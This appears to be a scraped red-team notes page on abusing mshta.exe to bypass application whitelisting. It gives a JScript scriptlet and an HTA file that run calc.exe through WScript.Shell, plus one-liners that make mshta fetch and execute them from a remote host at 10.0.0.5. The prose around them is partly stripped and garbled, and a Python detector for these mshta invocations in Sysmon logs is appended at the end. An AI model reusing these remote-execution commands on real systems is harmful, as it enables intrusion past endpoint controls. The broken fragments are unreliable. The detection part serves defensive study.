[28025] 2020-01-05_MSHTA Code Execution - Bypassing Application Whitelisting

Document creator: s7ckTeam
Last updated: 2025-01-19
MSHTA - Ots 2020-01-05

calc.exe

http://10.0.0.5/m.sct

    <?XML version="1.0"?>
    <scriptlet>
    <registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

    <public>
        <method name="Exec"></method>
    </public>

    <script language="JScript">
    <![CDATA[
        function Exec() {
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        }
    ]]>
    </script>
    </scriptlet>

scriptlet

attacker@victim

    # from powershell
    /cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();

calc.exe mshta.exe calc.exe mhsta cmd 退 sysmon mshta

hta

    mshta.exe http://10.0.0.5/m.hta

http://10.0.0.5/m.hta

    <html>
    <head>
    <script language="VBScript">
        Sub RunProgram
            Set objShell = CreateObject("Wscript.Shell")
            objShell.Run "calc.exe"
        End Sub
    RunProgram()
    </script>
    </head>
    <body>
        Nothing to see here..
    </body>
    </html>
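A defender-side check for the two invocation forms shown above, as an added example that is not part of the original document: it flags mshta.exe process-creation records whose command line carries an inline script protocol, a remote scriptlet moniker or a remote URL, and any process whose parent is mshta.exe. The records are constructed samples that use Sysmon Event ID 1 field names (Image, CommandLine, ParentImage); the function names and finding labels are assumptions of this example.

```python
import re

# Argument shapes matching the two invocation forms shown on this page.
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.I)
SCRIPT_MONIKER = re.compile(r"(?<![a-z])script:\s*https?://", re.I)
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"')]+", re.I)

def is_mshta(path):
    """True when the file name of an image path is mshta.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "mshta.exe"

def classify(event):
    """Return findings for one process-creation record (Sysmon Event ID 1 fields)."""
    findings = []
    cmd = event.get("CommandLine", "")
    if is_mshta(event.get("Image", "")):
        if INLINE_SCRIPT.search(cmd):
            findings.append("inline-script-protocol")
        if SCRIPT_MONIKER.search(cmd):
            findings.append("remote-scriptlet-moniker")
        if REMOTE_URL.search(cmd):
            findings.append("remote-url-argument")
    # Anything spawned by mshta.exe deserves a look; baseline known HTA apps first.
    if is_mshta(event.get("ParentImage", "")):
        findings.append("child-of-mshta")
    return findings

def triage(events):
    """Keep only the records that produced at least one finding."""
    return [(e["Image"], f) for e in events if (f := classify(e))]

# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "mshta.exe http://10.0.0.5/m.hta"},
    {"Image": r"C:\Windows\System32\calc.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "calc.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

if __name__ == "__main__":
    for image, findings in triage(SAMPLE_EVENTS):
        print(image, findings)
```

The last sample, a local .hta opened from explorer.exe, produces no finding, which is the baseline case the other three are measured against.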